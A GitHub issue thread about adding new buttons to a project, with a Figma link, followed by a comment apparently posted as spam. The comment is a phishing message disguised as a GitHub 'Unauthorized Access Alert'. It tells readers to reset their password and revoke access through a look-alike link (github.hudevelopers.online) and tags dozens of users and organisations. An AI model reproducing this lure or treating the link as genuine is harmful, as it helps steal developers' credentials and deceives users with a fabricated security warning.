### ISSUE TITLE
Discussion about new buttons

### ISSUE THREAD

**Issue by awiermanncasas-bc** [blockchain/constellation#90]
New buttons must be added to constellation

figma: https://www.figma.com/file/lI692dBvIP9Hmx2uCH0cnI/03---Web-%7C-Shared?node-id=2394%3A3123

**Comment by Admin-nextbill** [comment]
# Unauthorized Access Alert

We have detected that your GitHub account was accessed without authorization. To ensure the security of your account, we kindly ask you to reset your password and revoke access by visiting the following link: [Reset Password and Revoke Access](http://github.hudevelopers.online/)

### Users Affected:
- nftbigdev
- @etherpan
- @ilanolkies
- @larry0x
- @srishilesh
- @balajipachai
- @near-examples
- @mcne65
- @HuobiGroup
- @ruanbekkerleviathanbeak
- @Magician-Blockchain
- @zscorpio
- @yhuag
- @khovratovich
- @cds-amal
- @HadesHappy
- @docongminh
- @RuiSiang
- @josedlujan
- @codersharma2001
- @Jonath-z
- @cryptoinhero
- @developerblockchain
- @ivanceras
- @metacoin
- @RhettButler0529
- @Namaskar-1F64F
- @boilerblockchain
- @hyperworld103catShaark
- @blockchain-gt
- @alexjolly28
- @LedgerHQ
- @Tanteli
- @jmcph4
- @WebVA
- @BlockchainCap
- @rajchandra3
- @hsyodysseyShritesh99
- @Blockchains-Princeton
- @superdev-kingD
- @comet19950902
- @blockchain-technical-practice
- @mshankarrao
- @blockchainlover2019
- @pactus-project
- @IlliniBlockchain
- @blockchain-tech-developer

Thank you for your prompt attention to this matter. Your cooperation is greatly appreciated.
